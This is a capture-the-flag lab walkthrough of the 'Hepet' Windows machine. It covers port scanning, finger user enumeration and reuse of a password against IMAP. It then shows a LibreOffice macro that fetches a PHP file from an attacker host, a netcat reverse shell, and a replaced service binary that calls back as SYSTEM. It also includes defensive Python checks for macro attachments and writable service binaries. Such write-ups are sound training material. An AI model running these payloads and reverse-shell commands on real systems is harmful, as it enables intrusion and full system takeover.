Machine Information
- Machine Name: Hepet
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
Nmap scan report for 192.168.146.140
Host is up, received user-set (0.023s latency).
Scanned at 2024-10-11 11:37:10 +08 for 572s
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
25/tcp open smtp syn-ack ttl 125 Mercury/32 smtpd (Mail server account Maiser)
| smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME, SIZE 0, HELP
|_ Recognized SMTP commands are: HELO EHLO MAIL RCPT DATA RSET AUTH NOOP QUIT HELP VRFY SOML Mail server account is 'Maiser'.
79/tcp open finger syn-ack ttl 125 Mercury/32 fingerd
| finger: Login: Admin Name: Mail System Administrator\x0D
| \x0D
|_[No profile information]\x0D
105/tcp open ph-addressbook syn-ack ttl 125 Mercury/32 PH addressbook server
106/tcp open pop3pw syn-ack ttl 125 Mercury/32 poppass service
110/tcp open pop3 syn-ack ttl 125 Mercury/32 pop3d
|_pop3-capabilities: APOP UIDL TOP EXPIRE(NEVER) USER
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
143/tcp open imap syn-ack ttl 125 Mercury/32 imapd 4.62
|_imap-capabilities: OK AUTH=PLAIN CAPABILITY X-MERCURY-1A0001 complete IMAP4rev1
443/tcp open ssl/http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Issuer: commonName=localhost
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2009-11-10T23:48:47
| Not valid after: 2019-11-08T23:48:47
| MD5: a0a4:4cc9:9e84:b26f:9e63:9f9e:d229:dee0
| SHA-1: b023:8c54:7a90:5bfa:119c:4e8b:acca:eacf:3649:1ff6
|_ssl-date: TLS randomness does not represent time
|_http-title: Time Travel Company Page
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
445/tcp open microsoft-ds? syn-ack ttl 125
2224/tcp open http syn-ack ttl 125 Mercury/32 httpd
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Mercury HTTP Services
5040/tcp open unknown syn-ack ttl 125
7680/tcp open pando-pub? syn-ack ttl 125
8000/tcp open http syn-ack ttl 125 Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1g PHP/7.3.23)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.3.23
| http-methods:
| Supported Methods: POST OPTIONS HEAD GET TRACE
|_ Potentially risky methods: TRACE
|_http-title: Time Travel Company Page
11100/tcp open vnc syn-ack ttl 125 VNC (protocol 3.8)
| vnc-info:
| Protocol version: 3.8
| Security types:
|_ Unknown security type (40)
20001/tcp open ftp syn-ack ttl 125 FileZilla ftpd 0.9.41 beta
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -r--r--r-- 1 ftp ftp 312 Oct 20 2020 .babelrc
| -r--r--r-- 1 ftp ftp 147 Oct 20 2020 .editorconfig
| -r--r--r-- 1 ftp ftp 23 Oct 20 2020 .eslintignore
| -r--r--r-- 1 ftp ftp 779 Oct 20 2020 .eslintrc.js
| -r--r--r-- 1 ftp ftp 167 Oct 20 2020 .gitignore
| -r--r--r-- 1 ftp ftp 228 Oct 20 2020 .postcssrc.js
| -r--r--r-- 1 ftp ftp 346 Oct 20 2020 .tern-project
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 build
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 config
| -r--r--r-- 1 ftp ftp 1376 Oct 20 2020 index.html
| -r--r--r-- 1 ftp ftp 425010 Oct 20 2020 package-lock.json
| -r--r--r-- 1 ftp ftp 2454 Oct 20 2020 package.json
| -r--r--r-- 1 ftp ftp 1100 Oct 20 2020 README.md
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 src
| drwxr-xr-x 1 ftp ftp 0 Oct 20 2020 static
|_-r--r--r-- 1 ftp ftp 127 Oct 20 2020 _redirects
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
|_ftp-bounce: bounce working!
33006/tcp open unknown syn-ack ttl 125
| fingerprint-strings:
| NULL:
|_ Host '192.168.251.146' is not allowed to connect to this MariaDB server
49664/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
A lot of ports, but let's have a look at port 8000 first.
Port 80
As usual, go through the enumeration steps, such as directory brute force and gathering useful information from the website.
After looking into everything, the only useful thing I found was some potential usernames along with their job positions. Somehow, there's a user with a weird job position.
But I had no idea what to do next, so I decided to look into other ports.
Port 79
This port could be used to perform username enumeration. I will be using finger-user-enum to do it.
./finger-user-enum.pl -U /usr/share/wordlists/seclists/Usernames/Names/names.txt -t 192.168.210.140 | grep -v "is not known"
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... /usr/share/wordlists/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Sun Oct 13 13:42:37 2024 #########
admin@192.168.210.140: Login: admin Name: Mail System Administrator....[No profile information]..
agnes@192.168.210.140: Login: agnes Name: Agnes....[No profile information]..
charlotte@192.168.210.140: Login: charlotte Name: Charlotte....[No profile information]..
jonas@192.168.210.140: Login: jonas Name: Jonas....[No profile information]..
magnus@192.168.210.140: Login: magnus Name: Magnus..
martha@192.168.210.140: Login: martha Name: Martha....[No profile information]..
######## Scan completed at Sun Oct 13 13:43:43 2024 #########
10177 results.
10177 queries in 66 seconds (154.2 queries / sec)
It seems like I found some usernames from port 79. I noticed that some of the usernames were actually the same as the ones I found on the website. The user with the weird job description, "jonas", is also found here. But it's another dead end for now, so I decided to move on to another port.
Port 143
Since jonas's job description is weird, I assumed it's a password and decided to spray it on each of the ports. Somehow, it works on port 143, which has something to do with the mail server.
hydra -l jonas -p SicMundusCreatusEst imap://192.168.210.140
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-10-13 14:00:45
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking imap://192.168.210.140:143/
[143][imap] host: 192.168.210.140 login: jonas password: SicMundusCreatusEst
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-10-13 14:00:46
Time to log in and have a look.
telnet 192.168.210.140 143
Trying 192.168.210.140...
Connected to 192.168.210.140.
Escape character is '^]'.
* OK localhost IMAP4rev1 Mercury/32 v4.62 server ready.
a1 login jonas SicMundusCreatusEst
a1 OK LOGIN completed.
a1 list "" *
* LIST (\NoInferiors) "/" INBOX
a1 OK LIST completed.
a1 select inbox
* 5 EXISTS
* 0 RECENT
* FLAGS (\Deleted \Draft \Seen \Answered)
* OK [UIDVALIDITY 1728781961] UID Validity
* OK [UIDNEXT 6] Predicted next UID
* OK [PERMANENTFLAGS (\Deleted \Draft \Seen \Answered)] Settable message flags
a1 OK [READ-WRITE] SELECT completed.
a1 fetch 1 body[text]
* 1 FETCH (BODY[text] {470}
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-502425.856729136
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Hey Jonas,
Please change your password, you cannot use the same password as your one liner description, just dont.
Thanks!
------MIME delimiter for sendEmail-502425.856729136--
)
It seems like I could read each of the emails. Time to check the remaining emails and hopefully get some useful information.
a1 fetch 2 body[text]
* 2 FETCH (BODY[text] {647}
This is a multi-part message in MIME format. To properly display this message you need a MIME-Version 1.0 compliant Email program.
------MIME delimiter for sendEmail-808784.915440814
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Team,
We will be changing our office suite to LibreOffice. For the moment, all the spreadsheets and documents will be first procesed in the mail server directly to check the compatibility.
I will forward all the documents after checking everything is working okay.
Sorry for the inconveniences.
------MIME delimiter for sendEmail-808784.915440814--
)
a1 OK FETCH complete.
Based on this email, I think it's time to perform a client-side attack: sending a malicious document to the mail server and hoping it executes, since the email mentions that documents will be processed on the mail server directly. Now I need to find the mail server's email address first, before I can send a malicious file.
a1 fetch 2 body[header]
* 2 FETCH (BODY[header] {739}
Received: from spooler by localhost (Mercury/32 v4.62); 19 Oct 2020 12:28:41 -0700
X-Envelope-To: <jonas@localhost>
Return-path: <mailadmin@localhost>
Received: from kali (192.168.118.8) by localhost (Mercury/32 v4.62) with ESMTP ID MG000001;
19 Oct 2020 12:28:40 -0700
Message-ID: <359094.447081105-sendEmail@kali>
From: "mailadmin@localhost" <mailadmin@localhost>
To: "agnes@localhost" <agnes@localhost>
Cc: "jonas@localhost" <jonas@localhost>,
"magnus@localhost" <magnus@localhost>
Subject: Important
Date: Mon, 19 Oct 2020 19:28:39 +0000
X-Mailer: sendEmail-1.56
MIME-Version: 1.0
Content-Type: multipart/related; boundary="----MIME delimiter for sendEmail-808784.915440814"
X-PMFLAGS: 570949760 0 1 YGWVEUL6.CNM
)
a1 OK FETCH complete.
Now that I have the email address, time to try to create a malicious .ods file and upload it.
Open LibreOffice Calc and create a new macro in Tools > Macros > Organize Macros > Basic, then create a new macro by clicking the file name and the New button.
Make sure that the macro is saved inside the malicious file. Time to write my own macro to get a reverse shell. I tried a lot of different options and found one that actually makes it work.
Sub Main
Shell("curl 192.168.45.177:8000/vuln.php -o C:\xampp\htdocs\vuln.php")
End Sub
The method I used is uploading a PHP file to the web service and getting RCE from there, as I tried getting a reverse shell directly but it did not work. After saving the malicious file, go to Tools > Customize > Events, look for Open Document and assign the created macro.
After everything is done, just save the malicious file and try to upload it. Also remember to prepare an HTTP server with vuln.php on it, since the macro downloads the file from there.
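A defender-side counterpart to the attachment described above, added here and not part of the original write-up: a Python check that a mail gateway could run on an .ods attachment before it is processed on the mail server, flagging embedded Basic modules, document event bindings and risky calls. The sample document is constructed in memory and assumes the layout LibreOffice uses for a document-embedded macro (module XML under Basic/, a script:event-listener in content.xml); the command inside the sample module is a placeholder.

```python
import io
import re
import zipfile

# Calls that a spreadsheet macro has little legitimate reason to make on a mail server.
RISKY_CALLS = re.compile(r"\b(Shell|ShellExecute|CreateObject)\s*\(", re.IGNORECASE)


def build_sample_ods(with_macro: bool) -> bytes:
    """Constructed sample, not a file from the write-up: a minimal ODF zip that mimics
    how LibreOffice stores a document-embedded Basic macro bound to a document event."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet",
                   compress_type=zipfile.ZIP_STORED)
        scripts = ""
        if with_macro:
            z.writestr("Basic/script-lc.xml", "<library:libraries/>")  # library index, not code
            z.writestr("Basic/Standard/Module1.xml",
                       '<script:module script:name="Module1">Sub Main\n'
                       '    Shell("PLACEHOLDER_COMMAND")\nEnd Sub</script:module>')
            # Event binding that runs Standard.Module1.Main when the document loads.
            scripts = ('<office:scripts><office:event-listeners>'
                       '<script:event-listener script:event-name="dom:load" xlink:href='
                       '"vnd.sun.star.script:Standard.Module1.Main?language=Basic&amp;location=document"/>'
                       '</office:event-listeners></office:scripts>')
        z.writestr("content.xml",
                   f"<office:document-content>{scripts}<office:body/></office:document-content>")
    return buf.getvalue()


def inspect_ods(data: bytes) -> dict:
    """Return what a gateway would want to know before letting the file be processed."""
    findings = {"basic_modules": [], "event_listeners": [], "risky_calls": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".xml"):
                continue
            text = z.read(name).decode("utf-8", "replace")
            if name.startswith("Basic/"):
                # script-lc.xml / script-lb.xml only index libraries; real code is in module files.
                if name.rsplit("/", 1)[-1].startswith("script-l"):
                    continue
                findings["basic_modules"].append(name)
                findings["risky_calls"] += [f"{name}:{m.group(1)}" for m in RISKY_CALLS.finditer(text)]
            else:
                # Document-level event bindings (e.g. dom:load) make the macro fire on open.
                findings["event_listeners"] += re.findall(r'script:event-name="([^"]+)"', text)
    # Any embedded macro is enough to hold the attachment; the other fields explain why.
    findings["quarantine"] = bool(findings["basic_modules"])
    return findings
```

On a real gateway the same inspect_ods() would be fed the decoded attachment bytes from the incoming message instead of the constructed sample.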
swaks --to mailadmin@localhost --from jonas@localhost --server 192.168.237.140:25 --header "Subject: a spreadsheet" --body "Please check this spreadsheet" --attach @exploit.ods
=== Trying 192.168.237.140:25...
=== Connected to 192.168.237.140.
<- 220 localhost ESMTP server ready.
-> EHLO kali
<- 250-localhost Hello kali; ESMTPs are:
<- 250-TIME
<- 250-SIZE 0
<- 250 HELP
-> MAIL FROM:<jonas@localhost>
<- 250 Sender OK - send RCPTs.
-> RCPT TO:<mailadmin@localhost>
<- 250 Recipient OK - send RCPT or DATA.
-> DATA
<- 354 OK, send data, end with CRLF.CRLF
-> Date: Mon, 14 Oct 2024 15:22:44 +0800
-> To: mailadmin@localhost
-> From: jonas@localhost
-> Subject: a spreadsheet
-> Message-Id: <20241014152244.103714@kali>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
-> MIME-Version: 1.0
-> Content-Type: multipart/mixed; boundary="----=_MIME_BOUNDARY_000_103714"
->
-> ------=_MIME_BOUNDARY_000_103714
-> Content-Type: text/plain
->
-> Please check this spreadsheet
-> ------=_MIME_BOUNDARY_000_103714
...
...
uploadserver
File upload available at /upload
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.237.140 - - [14/Oct/2024 15:30:03] "GET /vuln.php HTTP/1.1" 200 -
After confirming the file was fetched, I reconfirmed by going to the website to make sure my vulnerable PHP file was uploaded.
It works, now it's time to get a reverse shell. I just uploaded my own nc.exe and used that to get a reverse shell.
rlwrap nc -nvlp 1234
listening on [any] 1234 ...
connect to [192.168.45.177] from (UNKNOWN) [192.168.237.140] 49330
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>whoami
whoami
hepet\ela arwel
Since I’m not administrator user, time to perform privilege escalation.
Privilege Escalation
I started with winPEAS and read through the information. It seems like there is an interesting folder in my current user's directory.
C:\Users\Ela Arwel>dir
dir
Volume in drive C has no label.
Volume Serial Number is A41E-B108
Directory of C:\Users\Ela Arwel
12/02/2021 09:44 AM <DIR> .
12/02/2021 09:44 AM <DIR> ..
12/01/2021 04:07 PM <DIR> 3D Objects
05/17/2021 01:53 PM 1,113 check_email.ps1
12/01/2021 04:07 PM <DIR> Contacts
04/13/2022 03:35 AM <DIR> Desktop
04/13/2022 03:31 AM <DIR> Documents
04/13/2022 02:48 AM <DIR> Downloads
12/01/2021 04:07 PM <DIR> Favorites
12/01/2021 04:07 PM <DIR> Links
12/01/2021 04:07 PM <DIR> Music
10/16/2020 03:25 PM <DIR> OneDrive
12/01/2021 04:07 PM <DIR> Pictures
12/01/2021 04:07 PM <DIR> Saved Games
12/01/2021 04:07 PM <DIR> Searches
10/20/2020 10:38 AM <DIR> Veyon
12/01/2021 04:07 PM <DIR> Videos
1 File(s) 1,113 bytes
16 Dir(s) 15,536,615,424 bytes free
I have a directory named Veyon, so I went through the directory as well as googling for useful information. I managed to find this, which seems useful.
C:\Users\Ela Arwel\Veyon>sc qc VeyonService
sc qc VeyonService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: VeyonService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\Ela Arwel\Veyon\veyon-service.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Veyon Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
It seems like the binary path is unquoted, but I do not have access to write files in the C:\Users\ directory. Since the whole Veyon directory is inside my current user's profile, I then checked if I have access to modify veyon-service.exe.
C:\Users\Ela Arwel\Veyon>icacls "C:\Users\Ela Arwel\Veyon\veyon-service.exe"
icacls "C:\Users\Ela Arwel\Veyon\veyon-service.exe"
C:\Users\Ela Arwel\Veyon\veyon-service.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
HEPET\Ela Arwel:(I)(F)
Successfully processed 1 files; Failed processing 0 files
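From the defender's side, the two listings above are exactly what a configuration audit should catch: a service running as LocalSystem whose binary sits in a location a normal user can write to. The Python below is an added example, not from the write-up or from Veyon, that parses sc qc and icacls output (the sample strings are taken from the listings above) and flags an unquoted path containing spaces plus any non-administrative principal holding write-capable rights.

```python
import re

# Sample inputs copied from the write-up's sc qc and icacls listings (whitespace normalised).
SC_QC_OUTPUT = r"""SERVICE_NAME: VeyonService
START_TYPE : 2 AUTO_START
BINARY_PATH_NAME : C:\Users\Ela Arwel\Veyon\veyon-service.exe
SERVICE_START_NAME : LocalSystem"""
ICACLS_OUTPUT = r"""C:\Users\Ela Arwel\Veyon\veyon-service.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
HEPET\Ela Arwel:(I)(F)
Successfully processed 1 files; Failed processing 0 files"""

PRIVILEGED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\ADMINISTRATORS", "NT SERVICE\\TRUSTEDINSTALLER"}
WRITE_CAPABLE = {"F", "M", "W", "WD", "WA", "WDAC", "WO"}  # icacls tokens that let a file be changed
ACE_RE = re.compile(r"^(.*?):((?:\([^)]*\))+)$")

def parse_sc_qc(text: str) -> dict:
    """Pull the service name, binary path and account out of `sc qc` output."""
    fields = {}
    for key in ("SERVICE_NAME", "BINARY_PATH_NAME", "SERVICE_START_NAME"):
        m = re.search(rf"^{key}\s*:\s*(.+?)\s*$", text, re.MULTILINE)
        fields[key] = m.group(1) if m else ""
    return fields

def parse_icacls(text: str, path: str) -> list:
    """Return (principal, {permission tokens}) pairs from `icacls <file>` output."""
    aces = []
    for line in text.splitlines():
        m = ACE_RE.match(line.strip())
        if not m:
            continue
        principal = m.group(1)
        if principal.startswith(path):  # the first line carries the file path in front
            principal = principal[len(path):].strip()
        tokens = {t for grp in re.findall(r"\(([^)]*)\)", m.group(2)) for t in grp.split(",") if t}
        aces.append((principal, tokens))
    return aces

def audit_service(sc_text: str, icacls_text: str) -> dict:
    """Flag what the write-up found: an unquoted path and a binary writable by a normal user."""
    cfg = parse_sc_qc(sc_text)
    path = cfg["BINARY_PATH_NAME"]
    writable_by = [p for p, toks in parse_icacls(icacls_text, path)
                   if p.upper() not in PRIVILEGED and toks & WRITE_CAPABLE]
    return {
        "service": cfg["SERVICE_NAME"],
        "runs_as": cfg["SERVICE_START_NAME"],
        "binary_path": path,
        "unquoted_path_with_spaces": not path.startswith('"') and " " in path,
        "writable_by": writable_by,
        # A normal user who can rewrite a LocalSystem service binary owns the host after a restart.
        "high_risk": bool(writable_by) and cfg["SERVICE_START_NAME"].lower() == "localsystem",
    }
```

The fix on the defender's side is the mirror image of the finding: install service binaries under a path only administrators can write, quote the path, and keep the service account as unprivileged as the software allows.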
Yep, I have full access, which means I could just replace it with my own vulnerable exe. I wrote my own vulnerable C code and compiled it into an exe.
#include <stdlib.h>

int main(void)
{
    /* Stand-in for veyon-service.exe: when the service starts, launch the
       previously uploaded nc.exe to call back to the author's listener. */
    system("C:\\xampp\\htdocs\\nc.exe 192.168.45.177 1235 -e cmd");
    return 0;
}
x86_64-w64-mingw32-gcc a.c -o test.exe
After compiling, just transfer to the victim machine.
C:\Users\Ela Arwel\Veyon>curl 192.168.45.177/test.exe -o veyon-service.exe
curl 192.168.45.177/test.exe -o veyon-service.exe
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 110k 100 110k 0 0 110k 0 0:00:01 --:--:-- 0:00:01 1006k
Now I could just restart the service and gain reverse shell.
C:\Users\Ela Arwel\Veyon>sc stop VeyonService
sc stop VeyonService
[SC] OpenService FAILED 5:
Access is denied.
It seems like I could not restart the service. I then checked if I have the privilege to restart the whole machine, since the service will auto start.
C:\Users\Ela Arwel\Veyon>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
Yep, I have the privilege to restart the machine. Time to restart and wait for the reverse shell.
C:\Users\Ela Arwel\Veyon>shutdown /r /t 0
shutdown /r /t 0
nc -nvlp 1235
listening on [any] 1235 ...
connect to [192.168.45.177] from (UNKNOWN) [192.168.237.140] 49668
Microsoft Windows [Version 10.0.19042.1348]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
Voilà ~ I managed to get an administrator shell.
Things I learned from this machine
- Client-side attacks suck, and it is hard to identify whether the exploit worked or not.
- If I get RCE but am unable to gain a reverse shell (like from this client-side attack), upload a vulnerable php or aspx file into the website.
- Check the user directory for useful information.
- PERMISSION IS EVERYTHING